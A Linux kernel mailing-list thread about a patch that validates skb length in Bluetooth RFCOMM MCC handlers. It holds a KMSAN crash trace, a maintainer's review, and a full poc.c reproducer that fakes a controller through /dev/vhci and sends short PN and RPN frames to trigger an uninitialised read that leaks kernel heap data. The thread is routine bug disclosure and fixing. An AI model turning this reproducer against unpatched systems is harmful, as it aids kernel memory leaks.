[ 441.385262][ T3375] ? kmsan_get_metadata+0xf1/0x160 [ 441.385482][ T3375] ? kmsan_get_metadata+0xf1/0x160 [ 441.385699][ T3375] ? kmsan_internal_set_shadow_origin+0x7a/0x110 [ 441.385975][ T3375] ? kmsan_get_metadata+0xf1/0x160 [ 441.386200][ T3375] ? kmsan_get_metadata+0xf1/0x160 [ 441.386421][ T3375] ? kmsan_get_shadow_origin_ptr+0x4a/0xb0 [ 441.386669][ T3375] ? __msan_metadata_ptr_for_store_8+0x27/0x40 [ 441.386936][ T3375] ? kmsan_get_metadata+0xf1/0x160 [ 441.387162][ T3375] __msan_warning+0x1b/0x30 [ 441.387366][ T3375] rfcomm_run+0x7eae/0xee90 [ 441.387582][ T3375] ? kmsan_get_metadata+0xf1/0x160 [ 441.387807][ T3375] ? __pfx_woken_wake_function+0x10/0x10 [ 441.388054][ T3375] kthread+0x53f/0x600 [ 441.388244][ T3375] ? __pfx_rfcomm_run+0x10/0x10 [ 441.388464][ T3375] ? __pfx_kthread+0x10/0x10 [ 441.388670][ T3375] ret_from_fork+0x20f/0x910 [ 441.388874][ T3375] ? __switch_to+0x51c/0x750 [ 441.389087][ T3375] ? __pfx_kthread+0x10/0x10 [ 441.389295][ T3375] ret_from_fork_asm+0x1a/0x30 [ 441.389514][ T3375] </TASK> [ 441.389958][ T3375] Kernel Offset: disabled [ 441.390138][ T3375] Rebooting in 86400 seconds.. [-- Attachment #3: poc.c --] [-- Type: text/x-csrc, Size: 10934 bytes --] #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stdint.h> #include <sys/socket.h> #include <sys/wait.h> #include <signal.h> #include <poll.h> #define AF_BLUETOOTH 31 #define BTPROTO_RFCOMM 3 #define ACL_HANDLE 0x0040 #define L2CAP_CID_SIG 0x0001 #define RFCOMM_SABM 0x2f #define RFCOMM_UA 0x63 #define RFCOMM_UIH 0xef #define RFCOMM_MCC_PN 0x20 #define RFCOMM_MCC_RPN 0x24 #define RFCOMM_ADDR(cr, dlci) (((dlci) << 2) | ((cr) << 1) | 1) #define RFCOMM_CTRL(type, pf) (((type) & ~0x10) | ((pf) << 4)) static int vhci_fd; static uint16_t local_cid = 0x0041; static uint16_t remote_cid = 0x0040; static const uint8_t crc_table[256] = { 0x00, 0x91, 0xe3, 0x72, 0x07, 0x96, 0xe4, 0x75, 0x0e, 0x9f, 0xed, 0x7c, 0x09, 0x98, 0xea, 0x7b, 0x1c, 0x8d, 0xff, 0x6e, 0x1b, 0x8a, 0xf8, 0x69, 0x12, 0x83, 0xf1, 0x60, 0x15, 0x84, 0xf6, 0x67, 0x38, 0xa9, 0xdb, 0x4a, 0x3f, 0xae, 0xdc, 0x4d, 0x36, 0xa7, 0xd5, 0x44, 0x31, 0xa0, 0xd2, 0x43, 0x24, 0xb5, 0xc7, 0x56, 0x23, 0xb2, 0xc0, 0x51, 0x2a, 0xbb, 0xc9, 0x58, 0x2d, 0xbc, 0xce, 0x5f, 0x70, 0xe1, 0x93, 0x02, 0x77, 0xe6, 0x94, 0x05, 0x7e, 0xef, 0x9d, 0x0c, 0x79, 0xe8, 0x9a, 0x0b, 0x6c, 0xfd, 0x8f, 0x1e, 0x6b, 0xfa, 0x88, 0x19, 0x62, 0xf3, 0x81, 0x10, 0x65, 0xf4, 0x86, 0x17, 0x48, 0xd9, 0xab, 0x3a, 0x4f, 0xde, 0xac, 0x3d, 0x46, 0xd7, 0xa5, 0x34, 0x41, 0xd0, 0xa2, 0x33, 0x54, 0xc5, 0xb7, 0x26, 0x53, 0xc2, 0xb0, 0x21, 0x5a, 0xcb, 0xb9, 0x28, 0x5d, 0xcc, 0xbe, 0x2f, 0xe0, 0x71, 0x03, 0x92, 0xe7, 0x76, 0x04, 0x95, 0xee, 0x7f, 0x0d, 0x9c, 0xe9, 0x78, 0x0a, 0x9b, 0xfc, 0x6d, 0x1f, 0x8e, 0xfb, 0x6a, 0x18, 0x89, 0xf2, 0x63, 0x11, 0x80, 0xf5, 0x64, 0x16, 0x87, 0xd8, 0x49, 0x3b, 0xaa, 0xdf, 0x4e, 0x3c, 0xad, 0xd6, 0x47, 0x35, 0xa4, 0xd1, 0x40, 0x32, 0xa3, 0xc4, 0x55, 0x27, 0xb6, 0xc3, 0x52, 0x20, 0xb1, 0xca, 0x5b, 0x29, 0xb8, 0xcd, 0x5c, 0x2e, 0xbf, 0x90, 0x01, 0x73, 0xe2, 0x97, 0x06, 0x74, 0xe5, 0x9e, 0x0f, 0x7d, 0xec, 0x99, 0x08, 0x7a, 0xeb, 0x8c, 0x1d, 0x6f, 0xfe, 0x8b, 0x1a, 0x68, 0xf9, 0x82, 0x13, 0x61, 0xf0, 0x85, 0x14, 0x66, 0xf7, 0xa8, 0x39, 0x4b, 0xda, 0xaf, 0x3e, 0x4c, 0xdd, 0xa6, 0x37, 0x45, 0xd4, 0xa1, 0x30, 0x42, 0xd3, 0xb4, 0x25, 0x57, 0xc6, 0xb3, 0x22, 0x50, 0xc1, 0xba, 0x2b, 0x59, 0xc8, 0xbd, 0x2c, 0x5e, 0xcf }; static uint8_t fcs2(uint8_t a, uint8_t c) { return 0xff - crc_table[crc_table[0xff ^ a] ^ c]; } static uint8_t fcs3(uint8_t a, uint8_t c, uint8_t l) { return 0xff - crc_table[crc_table[crc_table[0xff ^ a] ^ c] ^ l]; } static void send_cc(uint16_t op, uint8_t *p, int len) { uint8_t pkt[512] = {0x04, 0x0e, 3 + len, 1, op & 0xff, op >> 8}; memcpy(pkt + 6, p, len); write(vhci_fd, pkt, 6 + len); } static void send_acl(uint16_t cid, uint8_t *data, int len) { uint8_t pkt[512] = { 0x02, ACL_HANDLE & 0xff, ((ACL_HANDLE >> 8) & 0x0f) | 0x20, (4 + len) & 0xff, (4 + len) >> 8, len & 0xff, len >> 8, cid & 0xff, cid >> 8 }; memcpy(pkt + 9, data, len); write(vhci_fd, pkt, 9 + len); } static void send_short_pn(uint8_t dlci) { uint8_t a = RFCOMM_ADDR(1, 0); uint8_t c = RFCOMM_CTRL(RFCOMM_UIH, 0); uint8_t f[] = {a, c, (5<<1)|1, (RFCOMM_MCC_PN<<2)|3, (3<<1)|1, dlci, 0xe0, 0x00, fcs2(a, c)}; send_acl(remote_cid, f, sizeof(f)); } static void send_short_rpn(uint8_t dlci) { uint8_t a = RFCOMM_ADDR(1, 0); uint8_t c = RFCOMM_CTRL(RFCOMM_UIH, 0); uint8_t f[] = {a, c, (4<<1)|1, (RFCOMM_MCC_RPN<<2)|3, (2<<1)|1, (dlci<<2)|3, 0x00, fcs2(a, c)}; send_acl(remote_cid, f, sizeof(f)); } static void rfcomm_client(void) { struct { uint16_t family; uint8_t addr[6]; uint8_t channel; } sa = {0}; while (access("/tmp/vhci_ready", F_OK)) usleep(100000); sleep(1); int fd = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM); sa.family = AF_BLUETOOTH; sa.addr[0] = 0xff; sa.addr[1] = 0xee; sa.addr[2] = 0xdd; sa.addr[3] = 0xcc; sa.addr[4] = 0xbb; sa.addr[5] = 0xaa; sa.channel = 1; connect(fd, (void *)&sa, sizeof(sa)); while (1) sleep(1); } static void hci_cmd(uint8_t *buf) { uint16_t op = buf[1] | (buf[2] << 8); switch (op) { case 0x0c03: case 0x0c01: case 0x0c45: case 0x0c52: case 0x080f: case 0x2074: case 0x0c16: case 0x0c18: case 0x0c19: case 0x0c1a: case 0x0c6d: case 0x0c46: case 0x0c24: case 0x0c13: case 0x2001: { uint8_t p[] = {0}; send_cc(op, p, 1); } break; case 0x0c58: case 0x0c38: case 0x0c39: case 0x0c44: case 0x2016: case 0x203b: { uint8_t p[] = {0, 0}; send_cc(op, p, 2); } break; case 0x0c25: case 0x100b: { uint8_t p[] = {0, 0, 0}; send_cc(op, p, 3); } break; case 0x0c23: { uint8_t p[] = {0, 0, 1, 0}; send_cc(op, p, 4); } break; case 0x2002: { uint8_t p[] = {0, 0xfb, 0, 8}; send_cc(op, p, 4); } break; case 0x0c1c: case 0x2023: { uint8_t p[] = {0,0,0,0,0}; send_cc(op, p, 5); } break; case 0x0c0d: { uint8_t p[] = {0, ACL_HANDLE&0xff, ACL_HANDLE>>8, 0, 0}; send_cc(op, p, 5); } break; case 0x100a: { uint8_t p[] = {0, 0, 4, 0, 8, 0}; send_cc(op, p, 6); } break; case 0x1009: { uint8_t p[] = {0, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66}; send_cc(op, p, 7); } break; case 0x2060: case 0x2061: case 0x2062: { uint8_t p[7] = {0}; send_cc(op, p, 7); } break; case 0x1005: { uint8_t p[] = {0, 0, 4, 0x40, 8, 0, 8, 0}; send_cc(op, p, 8); } break; case 0x1001: case 0x1003: case 0x2003: { uint8_t p[] = {0, 0xff, 0xff, 0x8f, 0xfe, 0xdb, 0xff, 0x5b, 0x87}; send_cc(op, p, 9); } break; case 0x201c: case 0x202f: { uint8_t p[] = {0, 0xfb, 0, 0x48, 8, 0xfb, 0, 0x48, 8}; send_cc(op, p, 9); } break; case 0x1004: { uint8_t p[11] = {0}; p[3] = 7; send_cc(op, p, 11); } break; case 0x1002: { uint8_t p[65] = {0}; p[5]=0xff; p[6]=0xff; p[7]=0xff; p[14]=8; send_cc(op, p, 65); } break; case 0x0c14: { uint8_t p[249] = {0}; send_cc(op, p, 249); } break; case 0x0c12: { uint8_t p[] = {0, 0, 0}; send_cc(op, p, 3); static int ready = 0; if (!ready) { ready = 1; close(open("/tmp/vhci_ready", O_CREAT|O_WRONLY, 0644)); } } break; case 0x0405: { uint8_t cs[] = {0x04, 0x0f, 4, 0, 1, 5, 4}; write(vhci_fd, cs, 7); usleep(100000); uint8_t cn[] = {0x04, 0x03, 11, 0, ACL_HANDLE&0xff, ACL_HANDLE>>8, 0xff, 0xee, 0xdd, 0xcc, 0xbb, 0xaa, 1, 0}; write(vhci_fd, cn, 14); } break; case 0x041b: { uint8_t cs[] = {0x04, 0x0f, 4, 0, 1, 0x1b, 4}; write(vhci_fd, cs, 7); usleep(50000); uint8_t ev[] = {0x04, 0x0b, 11, 0, ACL_HANDLE&0xff, ACL_HANDLE>>8, 0xff, 0xff, 0x8f, 0xfe, 0xdb, 0xff, 0x5b, 0x87}; write(vhci_fd, ev, 14); } break; case 0x041c: { uint8_t cs[] = {0x04, 0x0f, 4, 0, 1, 0x1c, 4}; write(vhci_fd, cs, 7); usleep(50000); uint8_t ev[] = {0x04, 0x23, 13, 0, ACL_HANDLE&0xff, ACL_HANDLE>>8, 1, 2, 7, 0, 0, 0, 0, 0, 0, 0}; write(vhci_fd, ev, 16); } break; case 0x0419: { uint8_t cs[] = {0x04, 0x0f, 4, 0, 1, 0x19, 4}; write(vhci_fd, cs, 7); usleep(50000); uint8_t ev[258] = {0x04, 0x07, 255, 0, 0xff, 0xee, 0xdd, 0xcc, 0xbb, 0xaa}; write(vhci_fd, ev, 258); } break; default: { uint8_t p[] = {0}; send_cc(op, p, 1); } break; } } static void execute(void) { uint8_t buf[512]; int dlc_connected = 0; uint8_t dlci = 0; vhci_fd = open("/dev/vhci", O_RDWR); write(vhci_fd, "\xff\x00", 2); while (!dlc_connected) { struct pollfd pfd = {vhci_fd, POLLIN, 0}; if (poll(&pfd, 1, 100) <= 0) continue; int len = read(vhci_fd, buf, 512); if (len <= 0) continue; if (buf[0] == 0x01) { hci_cmd(buf); } else if (buf[0] == 0x02 && len >= 9) { uint16_t cid = buf[7] | (buf[8] << 8); if (cid == L2CAP_CID_SIG) { uint8_t code = buf[9], id = buf[10]; if (code == 0x02) { local_cid = buf[15] | (buf[16] << 8); uint8_t r[] = {3, id, 8, 0, remote_cid&0xff, remote_cid>>8, local_cid&0xff, local_cid>>8, 0, 0, 0, 0}; send_acl(L2CAP_CID_SIG, r, 12); } else if (code == 0x04) { uint8_t r[] = {5, id, 6, 0, local_cid&0xff, local_cid>>8, 0, 0, 0, 0}; send_acl(L2CAP_CID_SIG, r, 10); usleep(50000); uint8_t c[] = {4, 0x10, 4, 0, local_cid&0xff, local_cid>>8, 0, 0}; send_acl(L2CAP_CID_SIG, c, 8); } else if (code == 0x0a) { uint16_t t = buf[13] | (buf[14] << 8); if (t == 2) { uint8_t r[] = {0x0b, id, 8, 0, 2, 0, 0, 0, 0x80, 2, 0, 0}; send_acl(L2CAP_CID_SIG, r, 12); } else if (t == 3) { uint8_t r[] = {0x0b, id, 0x0c, 0, 3, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0}; send_acl(L2CAP_CID_SIG, r, 16); } } } else if (cid == remote_cid && len >= 12) { uint8_t addr = buf[9], ctrl = buf[10]; uint8_t d = (addr >> 2) & 0x3f; if ((ctrl & 0xef) == RFCOMM_SABM) { uint8_t cr = (addr >> 1) & 1; uint8_t ua_a = RFCOMM_ADDR(cr ? 0 : 1, d); uint8_t ua_c = RFCOMM_CTRL(RFCOMM_UA, 1); uint8_t ua[] = {ua_a, ua_c, 1, fcs3(ua_a, ua_c, 1)}; send_acl(remote_cid, ua, 4); if (d) { dlci = d; dlc_connected = 1; } } else if ((ctrl & 0xef) == RFCOMM_UIH && d == 0 && len >= 14) { if ((buf[12] >> 2) == RFCOMM_MCC_PN && (buf[12] & 2)) { uint8_t pd = buf[14]; uint8_t a = RFCOMM_ADDR(1, 0); uint8_t c = RFCOMM_CTRL(RFCOMM_UIH, 0); uint8_t f[] = {a, c, (10<<1)|1, (RFCOMM_MCC_PN<<2)|1, (8<<1)|1, pd, 0xe0, 0, 0, 0x9b, 2, 0, 7, fcs2(a, c)}; send_acl(remote_cid, f, 14); } } } } } usleep(100000); send_short_pn(dlci); usleep(100000); send_short_rpn(dlci); sleep(2); } int main(void) { unlink("/tmp/vhci_ready"); pid_t pid = fork(); if (pid == 0) { rfcomm_client(); return 0; } execute(); kill(pid, SIGKILL); waitpid(pid, NULL, 0); return 0; } ^ permalink raw reply [flat|nested] 5+ messages in thread
* Re: [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers 2026-04-12 4:54 [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers SeungJu Cheon 2026-04-12 5:59 ` bluez.test.bot 2026-04-12 7:37 ` [PATCH] " Paul Menzel @ 2026-04-13 18:19 ` Luiz Augusto von Dentz 2 siblings, 0 replies; 5+ messages in thread From: Luiz Augusto von Dentz @ 2026-04-13 18:19 UTC (permalink / raw) To: SeungJu Cheon Cc: linux-bluetooth, marcel, kees, kuba, me, shuah, linux-kernel-mentees, linux-kernel Hi, On Sun, Apr 12, 2026 at 12:55 AM SeungJu Cheon <suunj1331@gmail.com> wrote: > > rfcomm_recv_pn(), rfcomm_recv_rpn(), rfcomm_recv_rls(), and > rfcomm_recv_msc() cast skb->data to their respective structs > without first checking skb->len. A remote device can send a > short MCC frame, causing out-of-bounds reads from the skb buffer. > > For rfcomm_recv_pn(), the uninitialized pn->mtu value is stored > in d->mtu via rfcomm_apply_pn(), then echoed back to the remote > device in the PN response, leaking kernel heap data. > > This results in use of uninitialized memory, as reported by KMSAN. > > Add explicit skb->len checks against the expected structure size > at the start of each handler before accessing the payload. > > ===================================================== > BUG: KMSAN: uninit-value in rfcomm_run+0x7eae/0xee90 > rfcomm_run+0x7eae/0xee90 > kthread+0x53f/0x600 > ret_from_fork+0x20f/0x910 > ret_from_fork_asm+0x1a/0x30 > > Uninit was created at: > kmem_cache_alloc_node_noprof+0x3cd/0x12d0 > __alloc_skb+0x855/0x1190 > vhci_write+0x125/0x960 > vfs_write+0xbe1/0x15c0 > ksys_write+0x1d9/0x470 > __x64_sys_write+0x97/0xf0 > x64_sys_call+0x2ff0/0x3ea0 > do_syscall_64+0x134/0xf80 > entry_SYSCALL_64_after_hwframe+0x77/0x7f > > CPU: 0 UID: 0 PID: 3374 Comm: krfcommd Tainted: G W 7.0.0-rc7 > Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) > Kernel panic - not syncing: kmsan.panic set ... > ===================================================== > > Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") > Signed-off-by: SeungJu Cheon <suunj1331@gmail.com> > --- > net/bluetooth/rfcomm/core.c | 40 +++++++++++++++++++++++++++++-------- > 1 file changed, 32 insertions(+), 8 deletions(-) > > diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c > index 611a9a94151e..daeba71a1514 100644 > --- a/net/bluetooth/rfcomm/core.c > +++ b/net/bluetooth/rfcomm/core.c > @@ -1431,9 +1431,15 @@ static int rfcomm_apply_pn(struct rfcomm_dlc *d, int cr, struct rfcomm_pn *pn) > > static int rfcomm_recv_pn(struct rfcomm_session *s, int cr, struct sk_buff *skb) > { > - struct rfcomm_pn *pn = (void *) skb->data; > + struct rfcomm_pn *pn; > struct rfcomm_dlc *d; > - u8 dlci = pn->dlci; > + u8 dlci; > + > + if (skb->len < sizeof(*pn)) > + return -EINVAL; > + > + pn = (void *) skb->data; > + dlci = pn->dlci; How about using skb_pull_data? > BT_DBG("session %p state %ld dlci %d", s, s->state, dlci); > > @@ -1483,8 +1489,8 @@ static int rfcomm_recv_pn(struct rfcomm_session *s, int cr, struct sk_buff *skb) > > static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_buff *skb) > { > - struct rfcomm_rpn *rpn = (void *) skb->data; > - u8 dlci = __get_dlci(rpn->dlci); > + struct rfcomm_rpn *rpn; > + u8 dlci; > > u8 bit_rate = 0; > u8 data_bits = 0; > @@ -1495,6 +1501,12 @@ static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_ > u8 xoff_char = 0; > u16 rpn_mask = RFCOMM_RPN_PM_ALL; > > + if (skb->len < sizeof(*rpn)) > + return -EINVAL; > + > + rpn = (void *) skb->data; > + dlci = __get_dlci(rpn->dlci); Ditto > BT_DBG("dlci %d cr %d len 0x%x bitr 0x%x line 0x%x flow 0x%x xonc 0x%x xoffc 0x%x pm 0x%x", > dlci, cr, len, rpn->bit_rate, rpn->line_settings, rpn->flow_ctrl, > rpn->xon_char, rpn->xoff_char, rpn->param_mask); > @@ -1589,8 +1601,14 @@ static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_ > > static int rfcomm_recv_rls(struct rfcomm_session *s, int cr, struct sk_buff *skb) > { > - struct rfcomm_rls *rls = (void *) skb->data; > - u8 dlci = __get_dlci(rls->dlci); > + struct rfcomm_rls *rls; > + u8 dlci; > + > + if (skb->len < sizeof(*rls)) > + return -EINVAL; > + > + rls = (void *) skb->data; > + dlci = __get_dlci(rls->dlci); Ditto > BT_DBG("dlci %d cr %d status 0x%x", dlci, cr, rls->status); > > @@ -1608,9 +1626,15 @@ static int rfcomm_recv_rls(struct rfcomm_session *s, int cr, struct sk_buff *skb > > static int rfcomm_recv_msc(struct rfcomm_session *s, int cr, struct sk_buff *skb) > { > - struct rfcomm_msc *msc = (void *) skb->data; > + struct rfcomm_msc *msc; > struct rfcomm_dlc *d; > - u8 dlci = __get_dlci(msc->dlci); > + u8 dlci; > + > + if (skb->len < sizeof(*msc)) > + return -EINVAL; > + > + msc = (void *) skb->data; > + dlci = __get_dlci(msc->dlci); Ditto. > BT_DBG("dlci %d cr %d v24 0x%x", dlci, cr, msc->v24_sig); > > -- > 2.52.0 > -- Luiz Augusto von Dentz ^ permalink raw reply [flat|nested] 5+ messages in thread
end of thread, other threads:[~2026-04-13 18:19 UTC | newest] Thread overview: 5+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2026-04-12 4:54 [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers SeungJu Cheon 2026-04-12 5:59 ` bluez.test.bot 2026-04-12 7:37 ` [PATCH] " Paul Menzel 2026-04-12 12:39 ` SeungJu Cheon 2026-04-13 18:19 ` Luiz Augusto von Dentz
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox